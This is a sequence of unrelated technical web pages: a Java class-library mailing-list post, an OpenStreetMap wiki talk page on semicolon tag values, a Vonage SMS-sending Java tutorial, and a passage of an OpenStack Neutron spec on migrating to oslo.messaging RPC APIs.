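    def prepare(self, version=None):
        # prepare() pins per-call options (here, just the version)
        return FakeCallContext(version or self.default_version)


class ClientAPI:
    """Mirrors the shape of the new-style client interface above."""
    def __init__(self):
        self.client = FakeClient(default_version="1.0")

    def remote_method(self, context, arg1):
        cctxt = self.client.prepare()
        return cctxt.call(context, "remote_method", arg1=arg1)

    def remote_method_2(self, context, arg1, arg2):
        cctxt = self.client.prepare(version="1.1")
        return cctxt.call(context, "remote_method_2", arg1=arg1, arg2=arg2)


api = ClientAPI()
print(api.remote_method(None, "x"))
print(api.remote_method_2(None, "x", "y"))
```

The point of the sketch is that version selection moves out of each call's arguments and into prepare(), which is what makes the new style read more cleanly.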
The oslo.messaging library itself has documentation. Looking at all of the existing code once it has been converted will help quite a bit as well, since you can just follow the existing pattern. The other impact is patch conflicts. Since this work involves some minor refactoring across the tree, it may conflict with other code in progress. This will only occur in the case of features that modify rpc APIs. The changes will be done in a series of smaller changes, which will help with rebasing and fixing conflicts against smaller sets of updates at a time.

Alternatives¶

The alternative is to leave the compatibility layer in place. The downsides of this are that Neutron’s use of oslo.messaging will diverge further and further from what the rest of OpenStack messaging usage looks like. It may also make it more difficult to take advantage of new features in oslo.messaging in the future.

Implementation¶

Testing¶

The unit tests will be updated as required. New ones will be added in key places where unit test coverage may be missing. There are no functional changes here, so all of the existing unit and functional tests will be relied upon to help ensure that no regressions are introduced.

References¶

Existing oslo.messaging documentation:
https://specs.openstack.org/openstack/neutron-specs/specs/kilo/drop-rpc-compat.html
CC-MAIN-2019-35
refinedweb
684
50.84
Chang Hyeon Lee, 2,008 Points

I need some help with UnboundLocalError

Now I am doing shopping list three and I followed the lecture like this:

```python
import os

# make a list to hold onto our items
shopping_list = []

def clear_screen():
    os.system("cls" if os.name == "nt" else "clear")

def show_help():
    clear_screen()
    # print out instructions on how to use the app
    print("What should we pick up at the store?")
    print("""
Enter 'DONE' to stop adding items.
Enter 'HELP' for this help.
Enter 'SHOW' to see your current list.
""")

def add_to_list(new_item):
    show_list()
    if len(shopping_list):
        position = input("Where should I add {}?\n"
                         "Press ENTER to add to the end of the list|n"
                         "> ".fomat(item))
    else:
        postion = 0

    try:
        position = abs(int(position))
    except ValueError:
        position = None
    if position is not None:
        shopping_list.insert(position-1, item)
    else:
        shopping_list.append(new_item)
    shoe_list()

    # add new items to our list
    shopping_list.append(new_item)
    print("Added {}. List now has {} items.".format(new_item, len(shopping_list)))

def show_list():
    clear_screen()
    # print out the list
    print("Here's your list:")
    index = 1
    for item in shopping_list:
        print("{}. {}".format(index, item))
        inext += 1
    print("-"*10)

show_help()

while True:
    # ask for new items
    new_item = input("> ")

    # be able to quit the app
    if new_item.upper() == 'DONE' or new_item.upper() == 'QUIT':
        break
    elif new_item.upper() == 'HELP':
        show_help()
        continue
    elif new_item.upper() == 'SHOW':
        show_list()
        continue
    else:
        add_to_list(new_item)

show_list()
```

When I imported this file it was working, but when I entered an item I got this message:

Traceback (most recent call last):
  File "shopping_list_3.py", line 77, in <module>
    add_to_list(new_item)
  File "shopping_list_3.py", line 32, in add_to_list
    position = abs(int(position))
UnboundLocalError: local variable 'position' referenced before assignment

I don't know about UnboundLocalError. What's the error in my code, and can you also explain what UnboundLocalError is? Thank you.
[MOD: added ```python formatting -cf]

1 Answer

Chris Freeman, Treehouse Moderator, 67,986 Points

The else: code block in add_to_list() has a typo:

postion = 0  # <- should be position

markmneimneh, 14,132 Points

Hello, try putting your code between ``` followed by html and then ended with ```; it is very hard to read what you have, as is. The ` is under the Esc key. Thanks
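The error itself is easy to reproduce in isolation. The function below is a stripped-down illustration (not the original code): position is only bound on one branch, so when the other branch runs, Python raises UnboundLocalError the moment the name is read. The exact error message wording varies between Python versions.

```python
def add_to_list(shopping_list, new_item):
    if len(shopping_list):
        position = 1          # 'position' is bound only on this branch...
    else:
        postion = 0           # typo! binds 'postion', leaving 'position' unbound

    # ...so reading it here fails whenever the else branch ran.
    try:
        position = abs(int(position))
    except UnboundLocalError as err:
        return str(err)
    return position

# With an empty list, the typo'd branch runs and the read fails:
print(add_to_list([], "milk"))

# With a non-empty list, 'position' was bound, so everything works:
print(add_to_list(["eggs"], "milk"))
```

Because the function assigns position somewhere in its body, Python treats it as a local variable everywhere in that function; reading it before any assignment has executed is what triggers UnboundLocalError. The fix is exactly what the answer says: correct the typo so position is assigned on every path.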
https://teamtreehouse.com/community/i-need-some-help-with-unboundlocalerror
CC-MAIN-2022-27
refinedweb
364
65.12
I currently have a Sphere object in the library that I instantiate at the start of the game: As you can see from the inspector of the Drone parent object, I have a rigidbody on this object. It does not have a collider. The DroneTrigger object only has a collider on it. I've read that with this setup, the child object's collider will take over for the parent if one of the parent's scripts implements OnTriggerEnter. I have yet to make this work as intended. I am trying to hit the DroneTrigger with a bullet object that I'm firing. When I was just using a collider on the Drone object, it worked fine. I want this to eventually allow me to use a second child collider for a different collision. EDIT: I'd like to add that when the player object enters the DroneTrigger trigger, it passes the Player collider fine. It just does not seem to like the one from the Bullet. Before you tell me, I've tried using FixedUpdate on the bullet. This is the DroneTrigger inspector: What is the purpose of the DroneTrigger script? And the Drone script? Can you tell us how you are trying to use OnTriggerEnter? Right now the DroneTrigger script has no code.
The Drone script has this:

public class Drone : MonoBehaviour
{
    private EnemyManager manager;
    public int health;
    public int damage;
    public float speed;

    void Awake()
    {
        manager = GameObject.Find("SpawnPoint").GetComponent<EnemyManager>();
    }

    // Use this for initialization
    void Start()
    {
        health = 20;
        speed = 5f;
        damage = 1;
    }

    // Update is called once per frame
    void Update()
    {
        if (manager.target != null)
            transform.position = Vector3.MoveTowards(transform.position,
                manager.target.collider.bounds.center, speed * Time.deltaTime);
    }

    public void OnTriggerEnter(Collider col)
    {
        CollisionManager.BulletTriggerEnter(col, gameObject);
    }
}

This function is in CollisionManager:

public static void BulletTriggerEnter(Collider otherCollider, GameObject drone)
{
    if (otherCollider != null && drone != null)
    {
        if (otherCollider.tag == "Bullet")
        {
            otherCollider.GetComponent<Bullet>().Deactivate();
            if (drone.GetComponent<Drone>().health <= 0)
                Destroy(drone);
            else
                drone.GetComponent<Drone>().health -= WeaponManager.Damage;
        }
    }
}

Answer by Owen-Reynolds · Oct 04, 2013 at 03:01 PM

Triggers don't "understand" compound colliders the way other colliders do (NOTE: Unity v4.01f2.) A fix is to add a "find my parent" to them. As you note, OnCollisionEnter is fine with a rigidbody parent with no collider, but with any number of child non-RB colliders. Hits on any kid count as hits on the parent, and you can check which exact kid it was. In code, collision.transform is the main RB object, and collision.collider is the particular kid.

But, with triggers, they only tell you the particular collider that entered/left/stayed. Even worse, if kid1 enters, and then kid2, they count both -- triggers are too "dumb" to know parentRB + kid1 + kid2 form one compound collider object.
A workaround is to find the parent yourself:

void OnTriggerEnter(Collider cc) {
    Transform T = cc.transform;
    while (T.parent != null)
        T = T.parent;
    // T is now the root of the compound collider
}

Or, depending on how objects are set up, go up parents until you get the correct tag, find a rigidbody ... .

Your method works fine, it's just that I cannot get the trigger to call the OnTriggerEnter function when the Bullet enters the trigger. The Player passes its collider just fine when I run into the Drone object. Again, the Bullet was hitting the trigger when I was using just the parent object with a collider and RB.

I was able to get the bullet to enter the trigger properly. I didn't realize I had collision between the Bullet layer and the Default layer turned off. I'm going to add the other colliders/triggers I wanted to add, and see if I have any problems.

Answer by SilentSin · Oct 04, 2013 at 01:36 PM

The OnTriggerEnter will go to either the object with the Rigidbody or the object with the collider. I'm not sure which.
https://answers.unity.com/questions/548579/how-can-i-get-compound-colliders-to-work-properly.html
CC-MAIN-2020-16
refinedweb
707
55.54
(For more resources on Groovy DSL, see here.) In a nutshell, the term metaprogramming refers to writing code that can dynamically change its behavior at runtime. A Meta-Object Protocol (MOP) refers to the capabilities in a dynamic language that enable metaprogramming. In Groovy, the MOP consists of four distinct capabilities within the language: reflection, metaclasses, categories, and expandos. The MOP is at the core of what makes Groovy so useful for defining DSLs. The MOP is what allows us to bend the language in different ways in order to meet our needs, by changing the behavior of classes on the fly. This section will guide you through the capabilities of MOP. Reflection To use Java reflection, we first need to access the Class object for any Java object in which are interested through its getClass() method. Using the returned Class object, we can query everything from the list of methods or fields of the class to the modifiers that the class was declared with. Below, we see some of the ways that we can access a Class object in Java and the methods we can use to inspect the class at runtime. 
import java.lang.reflect.Field;
import java.lang.reflect.Method;

public class Reflection {
    public static void main(String[] args) {
        String s = new String();
        Class sClazz = s.getClass();
        Package _package = sClazz.getPackage();
        System.out.println("Package for String class: ");
        System.out.println("   " + _package.getName());

        Class oClazz = Object.class;
        System.out.println("All methods of Object class:");
        Method[] methods = oClazz.getMethods();
        for (int i = 0; i < methods.length; i++)
            System.out.println("   " + methods[i].getName());

        try {
            Class iClazz = Class.forName("java.lang.Integer");
            Field[] fields = iClazz.getDeclaredFields();
            System.out.println("All fields of Integer class:");
            for (int i = 0; i < fields.length; i++)
                System.out.println("   " + fields[i].getName());
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }
    }
}

We can access the Class object from an instance by calling its Object.getClass() method. If we don't have an instance of the class to hand, we can get the Class object by using .class after the class name, for example, String.class. Alternatively, we can call the static Class.forName, passing to it a fully-qualified class name. Class has numerous methods, such as getPackage(), getMethods(), and getDeclaredFields(), that allow us to interrogate the Class object for details about the Java class under inspection. The preceding example will output various details about the String, Object, and Integer classes.

Groovy Reflection shortcuts

Groovy, as we would expect by now, provides shortcuts that let us reflect classes easily. In Groovy, we can shortcut the getClass() method as a property access .class, so we can access the class object in the same way whether we are using the class name or an instance. We can treat the .class as a String, and print it directly without calling Class.getName(), as follows:

def greeting = "Hello"
println greeting.class

The variable greeting is declared with a dynamic type, but has the type java.lang.String after the "Hello" String is assigned to it.
Classes are first-class objects in Groovy, so we can assign String to a variable. When we do this, the object that is assigned is of type java.lang.Class. However, it describes the String class itself, so printing it will report java.lang.String. Groovy also provides shortcuts for accessing packages, methods, fields, and just about all other reflection details that we need from a class. We can access these straight off the class identifier, as follows:

println "Package for String class"
println "   " + String.package
println "All methods of Object class:"
Object.methods.each { println "   " + it }
println "All fields of Integer class:"
Integer.fields.each { println "   " + it }

Incredibly, these six lines of code do all of the same work as the 30 lines in our Java example. If we look at the preceding code, it contains nothing that is more complicated than it needs to be. Referencing String.package to get the Java package of a class is as succinct as you can make it. As usual, String.methods and String.fields return Groovy collections, so we can apply a closure to each element with the each method. What's more, the Groovy version outputs a lot more useful detail about the package, methods, and fields.

When using an instance of an object, we can use the same shortcuts through the class field of the instance:

def greeting = "Hello"
assert greeting.class.package == String.package

Expandos

An Expando is a dynamic representation of a typical Groovy bean. Expandos support typical get and set style bean access, but in addition to this they will accept gets and sets to arbitrary properties. If we try to access a non-existing property, the Expando does not mind; instead of causing an exception, it will return null. If we set a non-existent property, the Expando will add that property and set the value. In order to create an Expando, we instantiate an object of class groovy.util.Expando.
def customer = new Expando()
assert customer.properties == [:]
assert customer.id == null
assert customer.properties == [:]

customer.id = 1001
customer.firstName = "Fred"
customer.surname = "Flintstone"
customer.street = "1 Rock Road"

assert customer.id == 1001
assert customer.properties == [
    id:1001, firstName:'Fred',
    surname:'Flintstone', street:'1 Rock Road']

customer.properties.each { println it }

The id field of customer is accessible on the Expando shown in the preceding example even when it does not exist as a property of the bean. Once a property has been set, it can be accessed by using the normal field getter: for example, customer.id. Expandos are a useful extension to normal beans where we need to be able to dump arbitrary properties into a bag and we don't want to write a custom class to do so. A neat trick with Expandos is what happens when we store a closure in a property. As we would expect, an Expando closure property is accessible in the same way as a normal property. However, because it is a closure, we can apply function call syntax to it to invoke the closure. This has the effect of seeming to add a new method on the fly to the Expando.

customer.prettyPrint = {
    println "Customer has following properties"
    customer.properties.each {
        if (it.key != 'prettyPrint')
            println "   " + it.key + ": " + it.value
    }
}

customer.prettyPrint()

Here we appear to be able to add a prettyPrint() method to the customer object, which outputs to the console:

Customer has following properties
   surname: Flintstone
   street: 1 Rock Road
   firstName: Fred
   id: 1001

Categories

Adding a closure to an Expando to give a new method is a useful feature, but what if we need to add methods to an existing class on the fly? Groovy provides another useful feature—Categories—for this purpose. A Category can be added to any class at runtime by using the use keyword. We can create Category classes that add methods to an existing class.
To create a Category for a class, we define a class containing static methods that take an instance of the class that we want to extend as their first parameter. By convention, we name this parameter self. When the method is invoked, self is set to the object instance that we are extending. The Category can then be applied to any closure by using the use keyword.

class Customer {
    int id
    String firstName
    String surname
    String street
    String city
}

def fred = new Customer(id:1001, firstName:"Fred",
    surname:"Flintstone", street:"1 Rock Road", city:"Bedrock")
def barney = new Customer(id:1002, firstName:"Barney",
    surname:"Rubble", street:"2 Rock Road", city:"Bedrock")
def customerList = [fred, barney]

class CustomerPrinter {
    static void prettyPrint(Customer self) {
        println "Customer has following properties"
        self.properties.each {
            if (it.key != 'prettyPrint')
                println "   " + it.key + ": " + it.value
        }
    }
}

use (CustomerPrinter) {
    for (customer in customerList)
        customer.prettyPrint()
}

Java libraries are full of classes that have been declared final. The library designers in their wisdom have decided that the methods they have added are all that we will ever need. Unfortunately, that is almost never the case in practice. Take the Java String class, for example. There are plenty of useful string manipulation features that we might like to have in the String class. Java has added methods progressively to this class over time: for instance, match and split in Java 1.4, with replace and format being added in Java 1.5. If we needed these style methods before Sun got around to adding them, we could not do it ourselves because of the final modifier. So the only option has been to use classes from add-on libraries such as Commons StringUtils. The Apache Commons Lang component contains a slew of useful classes that augment the basic capabilities of Java classes, including BooleanUtils, StringUtils, DateUtils, and so on.
All of the util class methods are implemented as static, taking a String as the first parameter. This is the typical pattern used in Java when we need to mix extra functionality into an existing class.

import org.apache.commons.lang.StringUtils;

public class StringSplitter {
    public static void main(String[] args) {
        String[] splits = StringUtils.split(args[0], args[1]);
        for (int i = 0; i < splits.length; i++) {
            System.out.println("token : " + splits[i]);
        }
    }
}

Conveniently, this pattern is the same as the one used by Groovy Categories, which means that the Apache Commons Lang util classes can all be dropped straight into a use block. So all of these useful utility classes are ready to be used in your Groovy code as Categories.

import org.apache.commons.lang.StringUtils

use (StringUtils) {
    "org.apache.commons.lang".split(".").each {
        println it
    }
}

Metaclass

In addition to the regular Java Class object that we saw earlier when looking at reflection, each Groovy object also has an associated MetaClass object. All Groovy classes secretly implement the groovy.lang.GroovyObject interface, which exposes a getMetaClass() method for each object.

public interface GroovyObject {
    /**
     * Invokes the given method.
     */
    Object invokeMethod(String name, Object args);

    /**
     * Retrieves a property value.
     */
    Object getProperty(String propertyName);

    /**
     * Sets the given property to the new value.
     */
    void setProperty(String propertyName, Object newValue);

    /**
     * Returns the metaclass for a given class.
     */
    MetaClass getMetaClass();

    /**
     * Allows the MetaClass to be replaced with a
     * derived implementation.
     */
    void setMetaClass(MetaClass metaClass);
}

Pure Java classes used in Groovy do not implement this interface, but they have a MetaClass assigned anyway. This MetaClass is stored in the MetaClass registry. Earlier versions of Groovy required a look-up in the registry to access the MetaClass. Since Groovy 1.5, the MetaClass of any class can be found by accessing its .metaClass property.
class Customer {
    int id
    String firstName
    String surname
    String street
    String city
}

// Access Groovy meta class
def groovyMeta = Customer.metaClass

// Access Java meta class from 1.5
def javaMeta = String.metaClass

// Access Groovy meta class prior to 1.5
def javaMetaOld = GroovySystem.metaClassRegistry.getMetaClass(String)

Metaclasses are the secret ingredient that makes the Groovy language dynamic. The MetaClass maintains all of the metadata about a Groovy class. This includes all of its available methods, fields, and properties. Unlike the Java Class object, the Groovy MetaClass allows fields and methods to be added on the fly. So while the Java Class can be considered as describing the compile-time behavior of the class, the MetaClass describes its runtime behavior. We cannot change the Class behavior of an object, but we can change its MetaClass behavior by adding properties or methods on the fly. The Groovy runtime maintains a single MetaClass per Groovy class, and these operate in close quarters with the GroovyObject interface. GroovyObject implements a number of methods, which in their default implementations are just facades to the equivalent MetaClass methods. The most important of these to understand is invokeMethod().

Pretended methods (MetaClass.invokeMethod)

An important distinction between Java and Groovy is that in Groovy a method call never invokes a class method directly. A method invocation on an object is always dispatched in the first place to the GroovyObject.invokeMethod() of the object. In the default case, this is relayed onto the MetaClass.invokeMethod() for the class, and the MetaClass is responsible for looking up the actual method. This indirect dispatching is the key to how a lot of Groovy power features work, as it allows us to hook ourselves into the dispatching process in interesting ways.
class Customer {
    int id
    String firstName
    String surname
    String street
    String city

    Object invokeMethod(String name, Object args) {
        if (name == "prettyPrint") {
            println "Customer has following properties"
            this.properties.each {
                println "   " + it.key + ": " + it.value
            }
        }
    }
}

def fred = new Customer(id:1001, firstName:"Fred",
    surname:"Flintstone", street:"1 Rock Road", city:"Bedrock")
def barney = new Customer(id:1002, firstName:"Barney",
    surname:"Rubble", street:"2 Rock Road", city:"Bedrock")
def customerList = [fred, barney]

customerList.each { it.prettyPrint() }

Above, we added a Customer.invokeMethod() to the Customer class. This allows us to intercept method invocations and respond to calls to Customer.prettyPrint() even though this method does not exist. Remember how in GroovyMarkup we appeared to be calling methods that did not exist? This is the core of how GroovyMarkup works. The Customer.prettyPrint() method in the previous code snippet is called a pretended method.

Understanding this, delegate, and owner

Like Java, Groovy has a this keyword that refers to the "current" or enclosing Java object. In Java, we don't have any other context that we can execute code in except a class method. In an instance method, this will always refer to the instance itself. In a static method, this has no meaning, as the compiler won't allow us to reference this in a static context. In addition to the instance methods, Groovy has three additional execution contexts to be aware of:

- Code running directly within a script, where the enclosing object is the script.
- Closure code where the enclosing object is either a script or an instance object.
- Closure code where the enclosing object is another closure.

The owner keyword refers to the enclosing object, which in the majority of cases is the same as this, the only exception being when a closure is surrounded by another closure.
The delegate keyword refers to the enclosing object and is usually the same as owner, except that delegate is assignable to another object. Closures relay method invocations that they handle themselves back to their delegate. This is how the methods of an enclosing class become available to be called by the closure, as if the closure were also an instance method. We will see later that one of the reasons builders work the way they do is that they are able to assign the delegate of a closure to themselves. The delegate will initially default to owner, except when we explicitly change the delegate to something else through the Closure.setDelegate method.

The following example illustrates this, owner, and delegate working under various different contexts. This example is necessarily complex, so take the time to read and understand it.

class Clazz {
    void method() {
        println "Class method this is : " + this.class
    }
    void methodClosure() {
        def methodClosure = {
            println "Method Closure this is : " + this.class
            assert owner == this
            assert delegate == this
        }
        methodClosure()
    }
}

def clazz = new Clazz()
clazz.method()

def closure = { self ->
    println "Closure this is : " + this.class
    assert this == owner
    assert delegate == clazz
    def closureClosure = {
        println "Closure Closure this is : " + this.class
        assert owner == self
        assert delegate == self
    }
    assert closureClosure.delegate == self
    closureClosure()
}

closure.delegate = clazz
closure(closure)
clazz.methodClosure()
println "Script this is : " + this.class

Running the preceding code will output the following text:

Class method this is : class Clazz
Closure this is : class ConsoleScript1
Closure Closure this is : class ConsoleScript1
Method Closure this is : class Clazz
Script this is : class ConsoleScript1

So the rules for resolving this, owner, and delegate in the various contexts are:

- In a class instance method, this is always the instance object. owner and delegate are not applicable and will be disallowed by the compiler.
- In a class static method, this, owner, and delegate references will be disallowed by the compiler.
- In a closure defined within a script, this, owner, and delegate all refer to the Script object, unless delegate has been reassigned.
- In a closure within a method, this and owner refer to the instance object of the enclosing class; as will delegate, unless it has been reassigned to another object.
- In a script, this is the Script object, and owner and delegate are not applicable.

Summary

In this article, we covered the Meta-Object Protocol (MOP) of the Groovy language. We now have an appreciation of what can be achieved by using features in the MOP.

Further resources on this subject:

- The Grails Object Relational Mapping (GORM) [article]
- Modeling Relationships with GORM [article]
https://www.packtpub.com/books/content/metaprogramming-and-groovy-mop
I have a new PHP class which I would like to call from a controller. Where, in the CakePHP folder structure, should I place this new class, and what is the procedure to invoke or make use of it from a controller? Thanks in advance for your cooperation!

From my point of view, you can reuse any of your own classes, and also any third-party class, as a utility class. If so, you can place the class in the src/Utility folder. Use the proper namespace, and after that you can use the class anywhere in CakePHP 3.x.

HOW TO PLACE: Say you have a class named Jorge. Save it in the src/Utility folder using the file name Jorge.php, and put the statement namespace App\Utility; at the top of your Jorge.php file.

HOW TO USE: In the file where you want to use this class, just put use App\Utility\Jorge;. After that, you can call the class in that file.

ALTERNATIVE SOLUTION: If you have a third-party package of many classes, then you can follow
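A minimal sketch of what the answer describes (the class name Jorge and its greet() method are illustrative placeholders, not part of CakePHP itself):

```php
<?php
// src/Utility/Jorge.php -- hypothetical utility class
namespace App\Utility;

class Jorge
{
    public function greet(string $name): string
    {
        return "Hello, " . $name . "!";
    }
}

// In a controller you would then write:
//
//     use App\Utility\Jorge;
//
//     $jorge = new Jorge();
//     $message = $jorge->greet('World');
```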
https://codedump.io/share/cnqNHYx39P8p/1/where-to-place-a-custom-php-class-in-cakephp-3
In this tutorial, we will learn how to get the current date and time from an NTP server with the ESP32 development board and Arduino IDE. In data logger applications, the current date and timestamp are useful to log values along with timestamps after a specific time interval. The time.h header file provides the current date and time, and we can correct drift in the RTC time using an NTP server. We have a similar guide for the ESP8266 NodeMCU: Getting Current Date and Time with ESP8266 NodeMCU using NTP Server.

Why We Need the Current Date and Time

Several times in electronic projects we are required to work with the current time, such as displaying it to the user or performing certain operations at a particular time. Therefore, it is important to access a precise time, which is not possible to obtain accurately through generic real-time clock (RTC) chips. A better, more precise solution is to use a central server via the Internet to receive the date and time. An NTP server, which is widely used worldwide, provides timestamps with a precision of approximately a few milliseconds of Coordinated Universal Time (UTC) without any supplementary hardware setup or costs. We will use a Network Time Protocol (NTP) server to request the current date and time.

NTP Server Architecture

The NTP server is based on a hierarchical structure consisting of three levels, where each level is known as a stratum. In the first level (stratum 0) there are highly precise atomic/radio clocks that provide the exact time. The second level (stratum 1) is directly connected with the first level and thus contains the most precise time available, which it receives from the first level. The third and last level (stratum 2) is the device that makes the request to the NTP server for the date/time from the second level. In the hierarchy, each level synchronizes with the level above it.

NTP Server Working

To get the date and time, our ESP32 board first needs to connect to the NTP server through the local network.
The ESP32 will send a request to the server after the connection is established. When the NTP server receives the request, it will transmit a time stamp containing the information regarding the time and date.

Getting Date & Time from the NTP Server

We will upload a program to our ESP32 board using Arduino IDE which will connect to the NTP server through our local network and request the current date and time. These values will then get displayed on our serial monitor automatically. One thing to take into account while accessing the time for your time zone is to look for daylight saving time and the Coordinated Universal Time (UTC) offset. If your country observes daylight saving time (click here to check), then you will have to incorporate it in the program code by adding 3600 (in seconds); otherwise the value stays 0. Pakistan does not observe daylight saving time, so we will put 0 in the daylight offset variable in the code. For the UTC offset, click here to check your time zone and add the offset in the program code after converting it to seconds. For example, a UTC offset of -11:00 converted to seconds becomes -39600 (-11*60*60). For Pakistan, the UTC offset is +05:00, so in our code we will specify the GMT offset (the same as the UTC offset) in seconds as 18000 (5*60*60).

Preparing Arduino IDE

Open your Arduino IDE and make sure you have the ESP32 add-on already installed in it. Recommended Reading: Install ESP32 in Arduino IDE (Windows, Linux, and Mac OS). Now go to File > New and open a new file. Copy the code given below into that file and then save it.
Arduino Sketch

    #include <WiFi.h>
    #include "time.h"

    const char* ssid = "SSID_NAME";         //Replace with your own SSID
    const char* password = "YOUR_PASSWORD"; //Replace with your own password

    const char* ntpServer = "pool.ntp.org";
    const long gmtOffset_sec = 18000;       //Replace with your GMT offset (seconds)
    const int daylightOffset_sec = 0;       //Replace with your daylight offset (seconds)

    void printLocalTime() {
      struct tm timeinfo;
      if (!getLocalTime(&timeinfo)) {
        Serial.println("Failed to obtain time");
        return;
      }
      Serial.println(&timeinfo, "%A, %B %d %Y %H:%M:%S");
    }

    void setup() {
      Serial.begin(115200);
      //connect to WiFi
      Serial.printf("Connecting to %s ", ssid);
      WiFi.begin(ssid, password);
      while (WiFi.status() != WL_CONNECTED) {
        delay(500);
        Serial.print(".");
      }
      Serial.println("CONNECTED to WIFI");
      //initialize NTP and print the time once
      configTime(gmtOffset_sec, daylightOffset_sec, ntpServer);
      printLocalTime();
    }

    void loop() {
      delay(1000);
      printLocalTime();
    }

How the Code Works?

In this section, we will understand how the code works. First, we define the necessary libraries at the start of the code: WiFi.h and time.h. The first library is required so that our ESP32 board can connect to the local WiFi network and hence to the NTP server. The time library will help us achieve the NTP synchronization and get the time.

    #include <WiFi.h>
    #include "time.h"

Then, we create two global variables of type char which will hold the network credentials through which our ESP32 module will connect. These are named ssid and password. To ensure a successful connection, replace their values with your network credentials.

    const char* ssid = "SSID_NAME";
    const char* password = "YOUR_PASSWORD";

Next, we define three more variables: one for the NTP server, which we specify as "pool.ntp.org", and two others for the GMT and daylight offsets in seconds. We have specified the offsets for Pakistan, but you can change them according to your time zone to obtain the correct time.
    const char* ntpServer = "pool.ntp.org";
    const long gmtOffset_sec = 18000; //Replace with your GMT offset (seconds)
    const int daylightOffset_sec = 0; //Replace with your daylight offset (seconds)

Inside our setup() function, we will initialize serial communication at a baud rate of 115200, as we want to display the current date and time on our serial monitor, by using Serial.begin().

    Serial.begin(115200);

The following section of code connects the ESP32 module to the local network. We will call WiFi.begin() and pass the ssid and password variables, which we defined before, inside it. After a successful connection has been established, the serial monitor will display the message "CONNECTED to WIFI".

    Serial.printf("Connecting to %s ", ssid);
    WiFi.begin(ssid, password);
    while (WiFi.status() != WL_CONNECTED) {
      delay(500);
      Serial.print(".");
    }
    Serial.println("CONNECTED to WIFI");

Next, we will use the configTime() function and pass three arguments inside it: the GMT offset, the daylight offset, and the NTP server, respectively. All three of these values were already defined by us.

    configTime(gmtOffset_sec, daylightOffset_sec, ntpServer);

printLocalTime()

    void printLocalTime() {
      struct tm timeinfo;
      if (!getLocalTime(&timeinfo)) {
        Serial.println("Failed to obtain time");
        return;
      }
      Serial.println(&timeinfo, "%A, %B %d %Y %H:%M:%S");
    }

Inside our infinite loop function, we will call the printLocalTime() function, which will display the current time and date on our serial monitor. We define this function by first creating a time structure named timeinfo. This will hold all the information relating to the time, e.g., the number of hours/minutes/seconds. Then, we will use the getLocalTime() function to transfer our request to the NTP server and parse the time stamp, which will be received in a human-readable format. Notice that we are passing the time structure as a parameter inside this function.
By accessing the members of this time structure (timeinfo), we will acquire the current date and time, which we will print on our serial monitor. The table shows the specifiers which we can use to access a particular part of the date/time. We will access the full weekday name, the full name of the month, the day of the month, the year, and the time in Hour(24h):Minute:Second format on a single line, and display it on our serial monitor through the line given below.

    Serial.println(&timeinfo, "%A, %B %d %Y %H:%M:%S");

Demonstration

After uploading the Arduino sketch to your ESP32 module, press the ENABLE button. Now open your serial monitor and you will be able to see the current date and time, updated every second.

Conclusion

In conclusion, with the help of an NTP server we can easily obtain the current time and date through our ESP32 development board, connected to a stable WiFi connection. You can view further articles regarding Epoch time by accessing the links below:

- Getting Epoch/Unix time with ESP8266 NodeMCU through NTP server using Arduino IDE
- Getting Epoch/Unix time with ESP32 through NTP server using Arduino IDE
https://microcontrollerslab.com/getting-current-date-time-esp32-arduino-ide-ntp-server/
A rhombus is a simple quadrilateral whose four sides all have the same length, and its perimeter can be found by two methods: from the side length, or from the diagonals. A quadrilateral has two diagonals, and based on the lengths of the diagonals, the area and perimeter of the quadrilateral can be found.

The formula for the perimeter of a rhombus using its diagonals is 2√(d1² + d2²).

LOGIC − To find the perimeter of a rhombus using its diagonals, you need the formula 2√(d1² + d2²). For this, your code needs to use the math library, which provides the square root and power functions.

The code below displays a program to find the perimeter of a rhombus using its diagonals.

    #include <stdio.h>
    #include <math.h>

    int main(){
        int d1 = 3, d2 = 4, perimeter;
        perimeter = (2 * sqrt(pow(d1,2) + pow(d2,2)));
        printf("perimeter is %d", perimeter);
        return 0;
    }

Output:

    perimeter is 10
https://www.tutorialspoint.com/program-to-find-the-perimeter-of-a-rhombus-using-diagonals
This is your resource to discuss support topics with your peers, and learn from each other.

02-04-2013 11:43 AM

Hi, I have a project that makes references to other projects in the workspace. Is there any way to reference those projects so I can avoid doing things like this:

    #include "../Screens/MainMenuScene.h"

and do this instead?

    #include "MainMenuScene.h"

thanks.
JB

Solved! Go to Solution.

02-04-2013 11:53 AM

02-04-2013 12:01 PM

Is that the same as doing: Properties -> C/C++ Build -> Settings -> Preprocessor? Thanks

02-04-2013 12:17 PM

It depends which type of project you use - managed or not, but basically yes, the same.
http://supportforums.blackberry.com/t5/Native-Development/Relative-paths-to-h-includes/m-p/2134647
import from FreeBSD RELENG_4 1.5.2.1

    /*-
     * ...
     */

    #if defined(LIBC_SCCS) && !defined(lint)
    #if 0
    static char sccsid[] = "@(#)freopen.c	8.1 (Berkeley) 6/4/93";
    #endif
    static const char rcsid[] =
      "$FreeBSD: src/lib/libc/stdio/freopen.c,v 1.5.2.1 2001/03/05 10:54:53 obrien Exp $";
    #endif /* LIBC_SCCS and not lint */

    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <errno.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include "libc_private.h"
    #include "local.h"

    /*
     * Re-direct an existing, open (probably) file to some other file.
     * ANSI is written such that the original file gets closed if at
     * all possible, no matter what.
     */
    FILE *
    freopen(file, mode, fp)
    	const char *file, *mode;
    	FILE *fp;
    {
    	int f;
    	int flags, isopen, oflags, sverrno, wantfd;

    	if ((flags = __sflags(mode, &oflags)) == 0) {
    		(void) fclose(fp);
    		return (NULL);
    	}

    	FLOCKFILE(fp);

    	if (!__sdidinit)
    		__sinit();

    	/* ... */
    }
http://www.dragonflybsd.org/cvsweb/src/lib/libc/stdio/freopen.c?rev=1.1;content-type=text%2Fx-cvsweb-markup
To get you started with Python (MicroPython) syntax, we’ve provided you with a number of code examples.

As with Python 3.5, variables can be assigned to and referenced. Below is an example of setting a variable equal to a string and then printing it to the console.

    variable = "Hello World"
    print(variable)

Conditional statements allow control over which elements of code run depending on specific cases. The example below shows how a temperature sensor might be implemented in code.

    temperature = 15
    target = 10
    if temperature > target:
        print("Too High!")
    elif temperature < target:
        print("Too Low!")
    else:
        print("Just right!")

Loops are another important feature of any programming language. They allow you to cycle your code and repeat functions/assignments/etc.

for loops allow you to control how many times a block of code runs within a range.

    x = 0
    for y in range(0, 9):
        x += 1
        print(x)

